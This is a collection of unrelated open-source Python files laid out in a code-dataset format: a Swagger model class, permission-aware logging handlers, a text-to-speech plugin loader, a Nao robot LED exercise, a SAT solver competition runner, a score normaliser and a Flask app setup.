CreditName - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'value': 'str'
}
self.attribute_map = {
'value': 'value'
}
self._value = value
@property
def value(self):
"""
Ge | ts the value | of this CreditName.
:return: The value of this CreditName.
:rtype: str
"""
return self._value
@value.setter
def value(self, value):
"""
Sets the value of this CreditName.
:param value: The value of this CreditName.
:type: str
"""
self._value = value
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, CreditName):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
vegitron/permissions_logging | permissions_logging/__init__.py | Python | apache-2.0 | 3,690 | 0.000271 | """
A collection of log handlers that allow file permissions to be specified.
"""
import logging
import logging.handlers as handlers
import os
import datetime
class FileHandler(logging.FileHandler):
"""
A subclass of logging.FileHandler that accepts a permissions argument.
The file used for logging will have the value of the permissions keyword
value, e.g. for unix: permissions=0o664
"""
def __init__(self, filename, permissions=0o644, **kwargs):
self.permissions = permissions
logging.FileHandler.__init__(self, filename)
def _open(self):
stream = logging.FileHandler._open(self)
try:
os.chmod(self.baseFilename, self.permissions)
except OSError as ex:
# If we don't have access to change the permissions, we need to
# rely on the initial file creator having done the chmod
pass
return stream
class DateNameFileHandler(FileHandler):
"""
A subclass that allows for filenames w/ a dateformat.
Will close and reopen filehandles as needed. |
For example, you could configure a handler to to have this filename:
/tmp/logs/my_app-%Y-%M-%d.log
"""
def __init__(self, *args, **kwargs):
self._originalBaseFilename = None
FileHandler.__init__(self, *args, **kwargs)
| def emit(self, *args, **kwargs):
"""
If we our open file's name no longer matches the current moment's
version of the filename, close it. emit in FileHandler will open
a new handle as needed.
"""
if self.baseFilename != self._get_current_filename():
self.close()
FileHandler.emit(self, *args, **kwargs)
def _open(self, *args, **kwargs):
"""
Saves the original base filename, then overrides it with a date
formatted filename. Uses strftime arguments.
"""
if not self._originalBaseFilename:
self._originalBaseFilename = self.baseFilename
self.baseFilename = self._get_current_filename()
return FileHandler._open(self, *args, **kwargs)
def _get_current_filename(self):
return datetime.datetime.now().strftime(self._originalBaseFilename)
class TimedRotatingFileHandler(FileHandler, handlers.TimedRotatingFileHandler):
"""
A subclass of logging.handlers.TimedRotatingFileHandler that accepts
a permissions argument.
The file used for logging will have the value of the permissions keyword
value, e.g. for unix: permissions=0o664
"""
def __init__(self, filename, permissions=0o644, **kwargs):
self.permissions = permissions
handlers.TimedRotatingFileHandler.__init__(self, filename, **kwargs)
class WatchedFileHandler(FileHandler, handlers.WatchedFileHandler):
"""
A subclass of logging.handlers.WatchedFileHandler that accepts
a permissions argument.
The file used for logging will have the value of the permissions keyword
value, e.g. for unix: permissions=0o664
"""
def __init__(self, filename, permissions=0o644, **kwargs):
self.permissions = permissions
handlers.WatchedFileHandler.__init__(self, filename, **kwargs)
class RotatingFileHandler(FileHandler, handlers.RotatingFileHandler):
"""
A subclass of logging.handlers.RotatingFileHandler that accepts
a permissions argument.
The file used for logging will have the value of the permissions keyword
value, e.g. for unix: permissions=0o664
"""
def __init__(self, filename, permissions=0o644, **kwargs):
self.permissions = permissions
handlers.RotatingFileHandler.__init__(self, filename, **kwargs)
|
linuxdeepin/deepin-translator | src/tts_interface.py | Python | gpl-3.0 | 4,811 | 0.008938 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2011 ~ 2013 Deepin, Inc.
# 2011 ~ 2013 Wang Yong
#
# Author: Wang Yong <lazycat.manatee@gmail.com>
# Maintainer: Wang Yong <lazycat.manatee@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from PyQt5.QtCore import pyqtSlot, QObject
import imp
from tts_plugin import TtsPlugin
from config import setting_config
from deepin_utils.net import is_network_connected
tts_plugin = TtsPlugin()
voice_simple = imp.load_source("voice_simple", tts_plugin.get_plugin_file(setting_config.get_translate_config("word_voice_engine")))
voice_long = imp.load_source("voice_long", tts_plugin.get_plugin_file(setting_config.get_translate_config("words_voice_engine")))
word_voice_model = tts_plugin.get_voice_model(setting_config.get_translate_config("src_lang"))
words_voice_model = tts_plugin.get_voice_model(setting_config.get_translate_config("src_lang"))
def get_voice_modules():
if not is_network_connected() or setting_config.get_trayicon_config("local_translate"):
voice_engines = tts_plugin.get_voice_engines(setting_config.get_translate_config("sr | c_lang"), False)
voice_engine_names = map(lambda (name, display_name): name, voice_engines)
if len(voice_engine_names) > 0:
local_simple = imp.load_source("local_simple", tts_plugin.get_plugin_file(voice_engine_names[0]))
return [local_simple]
else:
return []
else:
return [voice_simple, voice_long]
def get_voice(text, voice):
if not is_network_connected() or setting_conf | ig.get_trayicon_config("local_translate"):
voice_engines = tts_plugin.get_voice_engines(setting_config.get_translate_config("src_lang"), False)
voice_engine_names = map(lambda (name, display_name): name, voice_engines)
if len(voice_engine_names) > 0:
local_simple = imp.load_source("local_simple", tts_plugin.get_plugin_file(voice_engine_names[0]))
return local_simple.get_voice(text)
else:
return []
else:
return voice.get_voice(text)
def get_voice_simple(text):
global voice_simple
return get_voice(text, voice_simple)
def get_voice_long(text):
global voice_long
return get_voice(text, voice_long)
def get_phonetic_symbol(text):
# Return nothing if text is not ONE word.
if len(text.split(" ")) <= 0:
return ""
if not is_network_connected() or setting_config.get_trayicon_config("local_translate"):
# Not found local phonetic yet.
return ""
else:
global voice_simple
return voice_simple.get_phonetic_symbol(text)
class TtsInterface(QObject):
def __init__(self):
QObject.__init__(self)
@pyqtSlot()
def update_word_voice_module(self):
global voice_simple
voice_simple = imp.load_source("voice_simple", tts_plugin.get_plugin_file(setting_config.get_translate_config("word_voice_engine")))
@pyqtSlot()
def update_words_voice_module(self):
global voice_long
voice_long = imp.load_source("voice_long", tts_plugin.get_plugin_file(setting_config.get_translate_config("words_voice_engine")))
@pyqtSlot()
def update_voice_with_src_lang(self):
voice_engines = tts_plugin.get_voice_engines(setting_config.get_translate_config("src_lang"))
voice_engine_names = map(lambda (name, display_name): name, voice_engines)
word_voice_model.setAll(voice_engines)
words_voice_model.setAll(voice_engines)
current_word_voice_engine = setting_config.get_translate_config("word_voice_engine")
current_words_voice_engine = setting_config.get_translate_config("words_voice_engine")
if current_word_voice_engine not in voice_engine_names:
setting_config.update_translate_config("word_voice_engine", voice_engine_names[0])
self.update_word_voice_module()
if current_words_voice_engine not in voice_engine_names:
setting_config.update_translate_config("words_voice_engine", voice_engine_names[0])
self.update_words_voice_module()
tts_interface = TtsInterface()
|
AdrienVR/NaoSimulator | TPINFO/Partie3/exercice1.py | Python | lgpl-3.0 | 659 | 0.045524 | #Initialisation
from time import sleep
from NaoCommunication import *
nao=NaoControle(Nao())
# 1 - Decrire le resultat de ce | morceau de code
# ...
for a in range(16):
if a%2==0:
nao.reglerCouleur(a,a*15,50,50)
else :
nao.reglerCouleur(a,255,0,0)
sleep(0.1)
for a in range(15,-1,-1):
nao.eteindreLed(a)
sleep(0.1)
# 2 - Decrire le resultat de ce deuxieme morceau de code
# ...
for a in range(15,-1,-1):
nao.allumerLed(a)
| sleep(0.1)
for a in range(0,16,1):
nao.eteindreLed(a)
sleep(0.1)
# 3 - A partir des exemples precedents, ecrire un code qui
# allume alternativement les deux leds 1 seconde chacune
# pendant 10 secondes.
|
TimSchmittmann/HamiltonSAT | competition.py | Python | mit | 10,521 | 0.044578 | import sys
import subprocess
import string
import random
import glob;
import os;
import shutil;
from subprocess import *
import resource
import signal
#
# set the default timeout to some value
#
DEFAULT_TIMEOUT = 10
DEFAULT_MEMORYLIMIT = 1024*1024*1024*2
#
# Set maximum CPU time to the global timeout
#
GLOBALTIMEOUT = DEFAULT_TIMEOUT
GLOBALMEMORYLIMIT = DEFAULT_MEMORYLIMIT
def setlimits():
#print "Setting resource limit in child (pid %d)" % os.getpid()
resource.setrlimit(resource.RLIMIT_CPU, (GLOBALTIMEOUT, GLOBALTIMEOUT+1))
resource.setrlimit(resource.RLIMIT_AS, (GLOBALMEMORYLIMIT, GLOBALMEMORYLIMIT+1))
os.setpgrp()
#
# Check whether a string is a number
#
def is_number(s):
try:
int(s)
return True
except ValueError:
return False
#
# Run the competition with the solvers and files specified in the list
#
def main( solversName, filesName, unsatInstancesList ):
# print PID
pid = os.getpgid(0)
competitionDir = os.getcwd()
print "process id: " + str(pid)
# read the two files
solversFile = open(solversName, 'r')
filesFile = open(filesName, 'r')
unsatFile = open( unsatInstancesList, 'r' )
solverData = solversFile.readlines()
fileData = filesFile.readlines()
unsatFilesList = unsatFile.readlines() # nothing more to do, each line contains exactly one file
solversFile.close()
filesFile.close()
unsatFile.close()
# split file data into filename and timeout
files = list()
timeouts = list()
print "checking files ..."
for line in fileData:
blankPos = line.find(" ")
fileName = line[0 : blankPos ]
if 0 == os.path.exists(fileName) :
print "file " + fileName + " does not exist or cannot be accessed, drop it"
continue
timeoutString = line [blankPos + 1:]
timeout = DEFAULT_TIMEOUT
if( is_number(timeoutString) ):
timeout = int( timeoutString )
files.append(fileName)
timeouts.append(timeout)
# print "found file " + fileName + " with timeout " + str(timeout)
# split solver data into solvername and solver call
solverNames = list() # name of the solver
solverCalls = list() # string to call the solver
solverTime = list() # time that has been used for solved instances
solverSolved = list() # number of correctly solved instances
solverFailed = list() # number of incorrect solutions
print "parsing solvers ..."
for line in solverData:
blankPos = line.find(" ")
solverName = line[0 : blankPos ]
solverCall = line [blankPos + 1:-1]
solverNames.append(solverName)
solverCalls.append(solverCall)
solverTime.append(0)
solverSolved.append(0)
solverFailed.append(0)
# print "found file " + fileName + " with timeout " + str(timeout)
print "default timeout: " +str(DEFAULT_TIMEOUT)
print "default memory limit: " +str(GLOBALMEMORYLIMIT)
print "run competition for " + str(len(solverNames)) + " solvers and " + str(len(files)) + " files\n\n"
evaFile = open ("evaluation.dat","w")
evaFile.write("instance ");
sys.stdout.write("instance ");
# delete old files!
for solver in solverNames:
evaFile.write(solver + " ");
sys.stdout.write(solver + " ")
evaFile.write("\n");
sys.stdout.write("\n")
# iterate over files
for j in range(0, len(files) ):
filename = files[j]
basename = os.path.basename(filename)
timeout = timeouts[j]
evaFile.write(filename + " ")
sys.stdout.write(filename + "-(" + str(timeout) + "s)"+ " ");
# store different found states for the current graph and all solvers
states=list()
foundSAT = False
foundUNSAT = False
# iterate over solvers
for i in range(0, len(solverNames) ):
solver = solverNames[i]
call = solverCalls[i]
# run the solver
errFile = open("tmp/"+solver+"-"+basename+".err", "w");
outFile = open("/tmp/"+solver+"-"+basename+"-"+str(pid), "w");
os.chdir("solvers/" + solver)
childTimer = os.times()[2]
# print call
#solvingProcess = subprocess.Popen( str(call + " " + filename).split(), shell=True, stderr=PIPE, stdout=PIPE, preexec_fn=signal.pause) # setlimits(timeout) ) #.communicate()[0]
GLOBALTIMEOUT = timeout
"""
print "Errfile: "+str(errFile);
print "outFile: "+str(outFile);
print "call: "+str(call + " " + filename);
"""
exitCode = subprocess.call(str(call + " " + filename).split(), stdout=outFile, stderr=errFile, preexec_fn=setlimits )
errFile.close()
outFile.close()
# wait for th | e solver to terminate
childTimer = os.times()[2] - childTimer
# print call + " " + filename + " with exitCode " + str(exitCode) + " and runtime " + str( childTimer ) + " vs " + str(timeout)
os.chdir(competitionDir)
# if exit code is negative, the process has been terminated by a signal (including timeout)
# if no valid exit code is found, the in | stance is considered as unsolved as well
if childTimer >= timeout or (exitCode != 10 and exitCode != 20):
evaFile.write("T ");
sys.stdout.write("T ");
states.append(0)
else:
# otherwise, check the returned solution
# subprocess.call(["cat","/tmp/"+solver+"-"+basename+"-"+str(pid)])
checkCode = subprocess.call(["./hc-verifier","-w","-v","-v", filename], stdin=open( "/tmp/"+solver+"-"+basename+"-"+str(pid) ) , stdout=open('/dev/null', 'w'), stderr=open('/dev/null', 'w') )
# inject faulty system
#if i == 0:
# checkCode = 20
# exitCode = 20
#print "checkcode: " + str(checkCode)
# evaluate the run
if checkCode == 10: # verified satisfiable hamiltonian cycle
solverTime[i] = solverTime[i] + childTimer
solverSolved[i] = solverSolved[i] + 1
evaFile.write(str(childTimer) + " ")
sys.stdout.write(str(childTimer) + " ");
states.append(10)
foundSAT = True
elif checkCode == 15: # false answer
solverFailed[i] = solverFailed[i] + 1
# copy faulty file!
outFile = open("/tmp/"+solver+"-"+basename+"-"+str(pid), "r");
errFile = open("tmp/"+solver+"-"+basename+".fail", "w+");
for line in outFile.readlines():
errFile.write( line )
errFile.close()
outFile.close()
evaFile.write("F"+str(exitCode)+" ")
sys.stdout.write("F"+str(exitCode)+"-" + str(childTimer) + "-" + str(checkCode) + " ");
states.append(15)
elif checkCode == 20: # unsat answer
solverTime[i] = solverTime[i] + childTimer
solverSolved[i] = solverSolved[i] + 1
evaFile.write(str(childTimer) + " ")
sys.stdout.write(str(childTimer) + " ");
states.append(20)
foundUNSAT = True
else:
evaFile.write("E-" + str(exitCode) + "-" + str(checkCode) + " ")
sys.stdout.write("E-"+ str(exitCode) + "-"+ str(checkCode) + " ");
states.append(127)
os.remove( "/tmp/"+solver+"-"+basename+"-"+str(pid) )
# checked all solvers, print next line
evaFile.write("\n")
sys.stdout.write("\n");
#TODO check unsat for all systems
if foundSAT and foundUNSAT :
print "found discrepancy for SAT and UNSAT ..."
print "states: : " + str( len(states) )
# solverFailed
for i in range(0, len(solverNames) ):
solver = solverNames[i]
print solver + " : " + str( states[i] )
if states[i] == 20: #incorrect value, as we have a verified sat value
if solverFailed[i] == 0:
print "disqualify solver " + solver + " for wrong answer on " + filename
solverFailed[i] = solverFailed[i] + 1
# print "CPU limit of parent (pid %d) after startup of child" % os.getpid(), resource.getrlimit(resource.RLIMIT_CPU)
# print "delete /tmp/*.txt*"
filelist = glob.glob("/tmp/*.txt*")
# print str(filelist)
for f in filelist:
os.remove(f)
# subprocess.call(["rm", "-f", "/tmp/*.txt*"], stdout=open('/dev/null', 'w'), stderr=open('/dev/null', 'w') )
# if j % 5 == 0:
# evaFile.close()
# subprocess.call(["./plotCactus.sh", "evaluation.dat", str( len(solverNames) ), "visualization"], stdout=open('/dev/null', 'w'), stderr=open('/dev/null', 'w') )
# evaFile = open ("evaluation.dat", "a" )
# do the final plot after all solvers have been executed
evaFile.close()
subprocess.call(["./plotCactus.sh", "evaluation.dat", s |
jashwanth9/Expert-recommendation-system | code/labels_range.py | Python | apache-2.0 | 806 | 0.008685 | import json
import numpy as np
import cPickle as pickle |
with open('../validation/v_xgboost_word_tfidf.csv') as train_file:
content = train_file.readlines()
testData = []
scores = []
element = content[1].strip("\r\n").split(",")
for i in range(1, len(content)):
element = content[i].strip("\r\n").split(",")
testData.append([element[0],element[1]])
scores.append(float(element[2]))
predictions = []
maxscore = max(scores)
minscore = min(scores)
for score in scores:
pre | dictions.append((score-minscore)/float(maxscore-minscore))
ypred = predictions
with open('../validation/v_xgboost_word_tfidf_0-1.csv', 'w') as f1:
f1.write('qid,uid,label\n')
for i in range(0, len(ypred)):
f1.write(testData[i][0]+','+testData[i][1]+','+str(ypred[i])+'\n') |
okfn/hashtag-listener | app.py | Python | mit | 519 | 0.003854 | #!/usr/bin/env python
import logging
from os import environ
from flask import Flask
from flask.ext.sqlalchemy import SQLAlchemy
app = Flask(__name__)
stream_handler = logging.StreamHandler()
app.logger.setLevel(logging.DEBUG)
app.logger.addHandler(stream_handler)
app.config['SQLALCHEMY_DATABASE_URI'] = (environ.get('DATABASE_URL') or
'sqlite:////tmp/test.db')
app.config['APIKEY'] = envi | ron.get('APIKEY')
db = SQLAlchemy(app)
from models import * |
from controllers import *
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.